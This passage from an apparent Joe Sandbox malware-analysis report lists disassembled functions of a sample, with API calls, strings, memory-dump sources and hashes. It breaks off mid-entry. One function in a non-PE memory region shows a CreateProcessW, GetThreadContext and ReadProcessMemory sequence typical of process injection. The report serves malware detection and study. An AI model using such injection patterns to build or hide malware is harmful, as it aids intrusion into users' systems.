                                                        • Opcode Fuzzy Hash: 5c2596eabcc9e97246d84ac27c04c511c61e3b4164e990dc03009f91bbdbdffd
                                                        • Instruction Fuzzy Hash: AC21D7749047889FE7728B248855FFBBBEDAF06314F04009EE79E56242C7747A84DB51
                                                        Function 000C7285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 000FEA39
                                                        • GetOpenFileNameW.COMDLG32(?), ref: 000FEA83
                                                          • Part of subcall function 000C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C4743,?,?,000C37AE,?), ref: 000C4770
                                                          • Part of subcall function 000E0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000E07B0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                        • String ID: X
                                                        • API String ID: 3777226403-3081909835
                                                        • Opcode ID: 64503d67adbbc66f0308c071c992d46bbe45cff19a5ae023e939df8ce95f2e0a
                                                        • Instruction ID: 863561fba3b1dd71ba82e7bb115434c3cb5d6b12a90ae0b108cdfab67d9c2f8f
                                                        • Opcode Fuzzy Hash: 64503d67adbbc66f0308c071c992d46bbe45cff19a5ae023e939df8ce95f2e0a
                                                        • Instruction Fuzzy Hash: 0B219071A042889BCB51DF98C845BEE7BF9AF49714F00805AF508BB242DFF45989DFA1
                                                        Function 001298E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 001298F8
                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0012990F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Temp$FileNamePath
                                                        • String ID: aut
                                                        • API String ID: 3285503233-3010740371
                                                        • Opcode ID: a0377717076b13fe67b6fe0a66b0d33c34e3fc891b8d75e27ff6a1cf06b9ab8c
                                                        • Instruction ID: 2b9bd12c60ef115151a7fbefa11648710135243fb090e0a95e020028ad714cc8
                                                        • Opcode Fuzzy Hash: a0377717076b13fe67b6fe0a66b0d33c34e3fc891b8d75e27ff6a1cf06b9ab8c
                                                        • Instruction Fuzzy Hash: 56D05E7958030DABDB50ABA0DC0EF9A773CE704700F0042B1BA54911A1EAB095A98B91
                                                        Function 0013CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 22c6b2ecaec9450fb32eb7e43b5ad8fee41448fde622bc7c1f189875fa17702f
                                                        • Instruction ID: f23685816df6eb97bc103d38d9347e8e45b28a44e5664ef7631c2c9eeda63327
                                                        • Opcode Fuzzy Hash: 22c6b2ecaec9450fb32eb7e43b5ad8fee41448fde622bc7c1f189875fa17702f
                                                        • Instruction Fuzzy Hash: 35F126756083419FCB14DF28C484A6ABBE5FF89314F14892EF8999B252DB30E945CF82
                                                        Function 000CF76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000E0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 000E0193
                                                          • Part of subcall function 000E0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 000E019B
                                                          • Part of subcall function 000E0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 000E01A6
                                                          • Part of subcall function 000E0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 000E01B1
                                                          • Part of subcall function 000E0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 000E01B9
                                                          • Part of subcall function 000E0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 000E01C1
                                                          • Part of subcall function 000D60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,000CF930), ref: 000D6154
                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 000CF9CD
                                                        • OleInitialize.OLE32(00000000), ref: 000CFA4A
                                                        • CloseHandle.KERNEL32(00000000), ref: 001045C8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                        • String ID:
                                                        • API String ID: 1986988660-0
                                                        • Opcode ID: e059b06e085b785126f23ffe432f3297772cf403460aaf53702f1211b2aa6810
                                                        • Instruction ID: 2a991521aad579fc616fb4aeaef1e0a45dcfd6b3f2280df57c4b41013c7552c6
                                                        • Opcode Fuzzy Hash: e059b06e085b785126f23ffe432f3297772cf403460aaf53702f1211b2aa6810
                                                        • Instruction Fuzzy Hash: CA8198B4901A40CEC384EF79A944A597BE7FB98306790812EA419DBB72FB7046C5CF21
                                                        Function 000C434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 000C4370
                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 000C4415
                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 000C4432
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_$_memset
                                                        • String ID:
                                                        • API String ID: 1505330794-0
                                                        • Opcode ID: 46fc9382fb23e495e0f8e40915489e705aa1479c5b449cee72b63191a80175c1
                                                        • Instruction ID: 75c6d519a04b15acea2db0565d94a05f6514efa93808f75a7a1e3f20ca5e098f
                                                        • Opcode Fuzzy Hash: 46fc9382fb23e495e0f8e40915489e705aa1479c5b449cee72b63191a80175c1
                                                        • Instruction Fuzzy Hash: 923191B0504701CFD761DF64D894B9FBBF9FB49308F00092EF69A82651EB71AA84CB52
                                                        Function 000E571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • __FF_MSGBANNER.LIBCMT ref: 000E5733
                                                          • Part of subcall function 000EA16B: __NMSG_WRITE.LIBCMT ref: 000EA192
                                                          • Part of subcall function 000EA16B: __NMSG_WRITE.LIBCMT ref: 000EA19C
                                                        • __NMSG_WRITE.LIBCMT ref: 000E573A
                                                          • Part of subcall function 000EA1C8: GetModuleFileNameW.KERNEL32(00000000,001833BA,00000104,?,00000001,00000000), ref: 000EA25A
                                                          • Part of subcall function 000EA1C8: ___crtMessageBoxW.LIBCMT ref: 000EA308
                                                          • Part of subcall function 000E309F: ___crtCorExitProcess.LIBCMT ref: 000E30A5
                                                          • Part of subcall function 000E309F: ExitProcess.KERNEL32 ref: 000E30AE
                                                          • Part of subcall function 000E8B28: __getptd_noexit.LIBCMT ref: 000E8B28
                                                        • RtlAllocateHeap.NTDLL(01430000,00000000,00000001,00000000,?,?,?,000E0DD3,?), ref: 000E575F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 1372826849-0
                                                        • Opcode ID: a2b5018d795b44bef76fe3e080ddc6a269f98d67c06e0a64a97e3621f1affac4
                                                        • Instruction ID: ca5c7085ebd328c3956a1c579dbb5f56e0b7b93dad493b0828f64a6cb781218b
                                                        • Opcode Fuzzy Hash: a2b5018d795b44bef76fe3e080ddc6a269f98d67c06e0a64a97e3621f1affac4
                                                        • Instruction Fuzzy Hash: DF014535308B81DED6502777FC46AAE77888F8276BF100825F488BB193DF709D404720
                                                        Function 001298A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00129548,?,?,?,?,?,00000004), ref: 001298BB
                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00129548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 001298D1
                                                        • CloseHandle.KERNEL32(00000000,?,00129548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 001298D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleTime
                                                        • String ID:
                                                        • API String ID: 3397143404-0
                                                        • Opcode ID: 12b8e9e37169751ca32dab116f3a941a349f97b82f1d6d1cb6d14540f1e45855
                                                        • Instruction ID: cb7c2b229a11dbcc3d93191c6c0cdecbca531598f944bf1b435bedd545bb47bb
                                                        • Opcode Fuzzy Hash: 12b8e9e37169751ca32dab116f3a941a349f97b82f1d6d1cb6d14540f1e45855
                                                        • Instruction Fuzzy Hash: D9E08636140228B7D7212F64EC09FCA7B59AB07B60F144124FB14695F087B125629798
                                                        Function 00128D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 00128D1B
                                                          • Part of subcall function 000E2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,000E9A24), ref: 000E2D69
                                                          • Part of subcall function 000E2D55: GetLastError.KERNEL32(00000000,?,000E9A24), ref: 000E2D7B
                                                        • _free.LIBCMT ref: 00128D2C
                                                        • _free.LIBCMT ref: 00128D3E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                        • Instruction ID: 2b21e8f18823352c18707195951448e28c0a0d38141245f0b7576e2af676b0b9
                                                        • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                        • Instruction Fuzzy Hash: 82E012A16466558ACB24A6B9BD40BD313DC4F58352714091DB50DE7187CF64F8568524
                                                        Function 000CA9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CALL
                                                        • API String ID: 0-4196123274
                                                        • Opcode ID: 3123a1e7671b24f09cbafdebca57f9e7367e1cc5fcb688f03afec34145f3cda8
                                                        • Instruction ID: 980f448c3da1e188b34c0e9901fa2679360b170e4be21df7afffc2a7a28428d3
                                                        • Opcode Fuzzy Hash: 3123a1e7671b24f09cbafdebca57f9e7367e1cc5fcb688f03afec34145f3cda8
                                                        • Instruction Fuzzy Hash: DD224470A08205DFC724DF14C495F6EB7E1BF89304F15896DE88A9B262DB71EC85DB82
                                                        Function 000C4C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: EA06
                                                        • API String ID: 4104443479-3962188686
                                                        • Opcode ID: b0837a654d60edb6d5b8576f905e744a46c4c6d090ac0d2bc41f784ade287405
                                                        • Instruction ID: 2818c1bbb178e4dba42534b6f77c271b50976cf2b9d35b6449115ab7945e8850
                                                        • Opcode Fuzzy Hash: b0837a654d60edb6d5b8576f905e744a46c4c6d090ac0d2bc41f784ade287405
                                                        • Instruction Fuzzy Hash: 43412821A041586BDF31AB648CB1FFE7FA2BB45310F29447DFC839A283D6209D8583A1
                                                        Function 000C7A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                        • Instruction ID: c2ea202175fdee22d158e4d89b781a0876e4f979e9386bd6b7c79d0e9d27ac2b
                                                        • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                        • Instruction Fuzzy Hash: 91316FB1604606AFC714DF69C891E6DB3A9FF88320715862DE519CB691EB70ED60CF90
                                                        Function 000C47D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsThemeActive.UXTHEME ref: 000C4834
                                                          • Part of subcall function 000E336C: __lock.LIBCMT ref: 000E3372
                                                          • Part of subcall function 000E336C: DecodePointer.KERNEL32(00000001,?,000C4849,00117C74), ref: 000E337E
                                                          • Part of subcall function 000E336C: EncodePointer.KERNEL32(?,?,000C4849,00117C74), ref: 000E3389
                                                          • Part of subcall function 000C48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 000C4915
                                                          • Part of subcall function 000C48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 000C492A
                                                          • Part of subcall function 000C3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000C3B68
                                                          • Part of subcall function 000C3B3A: IsDebuggerPresent.KERNEL32 ref: 000C3B7A
                                                          • Part of subcall function 000C3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,001852F8,001852E0,?,?), ref: 000C3BEB
                                                          • Part of subcall function 000C3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 000C3C6F
                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 000C4874
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                        • String ID:
                                                        • API String ID: 1438897964-0
                                                        • Opcode ID: 6f8c4f99230c1660222e27599b63d3fa8e60de480de91f7c7cd0ddb064963089
                                                        • Instruction ID: 837b900665673febdb7d5c8dce4c8c7c1f40c190b978af380bd58ae7f8a5b407
                                                        • Opcode Fuzzy Hash: 6f8c4f99230c1660222e27599b63d3fa8e60de480de91f7c7cd0ddb064963089
                                                        • Instruction Fuzzy Hash: A4116A719083419BC700DF29D809A4EBFE9EB95750F10451EF044972B2DF709689CB92
                                                        Function 000E0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000E571C: __FF_MSGBANNER.LIBCMT ref: 000E5733
                                                          • Part of subcall function 000E571C: __NMSG_WRITE.LIBCMT ref: 000E573A
                                                          • Part of subcall function 000E571C: RtlAllocateHeap.NTDLL(01430000,00000000,00000001,00000000,?,?,?,000E0DD3,?), ref: 000E575F
                                                        • std::exception::exception.LIBCMT ref: 000E0DEC
                                                        • __CxxThrowException@8.LIBCMT ref: 000E0E01
                                                          • Part of subcall function 000E859B: RaiseException.KERNEL32(?,?,?,00179E78,00000000,?,?,?,?,000E0E06,?,00179E78,?,00000001), ref: 000E85F0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 3902256705-0
                                                        • Opcode ID: 5b1efde6c3c133767f180c9676d0f6fb144af418c0f83bf6c63303b95f17262c
                                                        • Instruction ID: 5a21c7836841b2b4876955b93c6c4edda72b3b7b2da5f75b9ec56c724e786b71
                                                        • Opcode Fuzzy Hash: 5b1efde6c3c133767f180c9676d0f6fb144af418c0f83bf6c63303b95f17262c
                                                        • Instruction Fuzzy Hash: 32F0A47250425AAEDB10AAEAED059DFBBACDF01311F104425FD18B6292DFB09A94C7D1
                                                        Function 000E53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000E8B28: __getptd_noexit.LIBCMT ref: 000E8B28
                                                        • __lock_file.LIBCMT ref: 000E53EB
                                                          • Part of subcall function 000E6C11: __lock.LIBCMT ref: 000E6C34
                                                        • __fclose_nolock.LIBCMT ref: 000E53F6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                        • String ID:
                                                        • API String ID: 2800547568-0
                                                        • Opcode ID: 1d61422acdd1a557594208a2fd2ba288e98762ad737cca5f1e28e84ed767abfd
                                                        • Instruction ID: 8107816d759b8f525c67341e3d773ce5ba8f0f8fab9e66fb429020afcbce1ba4
                                                        • Opcode Fuzzy Hash: 1d61422acdd1a557594208a2fd2ba288e98762ad737cca5f1e28e84ed767abfd
                                                        • Instruction Fuzzy Hash: 59F09671801A849ED7206B779C067ED77F06F4137AF25C505A428BB1C3CFBC4A415B52
                                                        Function 014CDCAD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 014CE46B
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 014CE501
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014CE523
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162345808.00000000014CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014CC000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_14cc000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                        • Instruction ID: 4343d30e744d4e9738bb313ab2bfea2c76248a5245229f7c50679f83a9597443
                                                        • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                        • Instruction Fuzzy Hash: C212ED24E24658C6EB24DF64D8507DEB232EF68700F1090ED910DEB7A4E77A4F81CB5A
                                                        Function 000E0C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
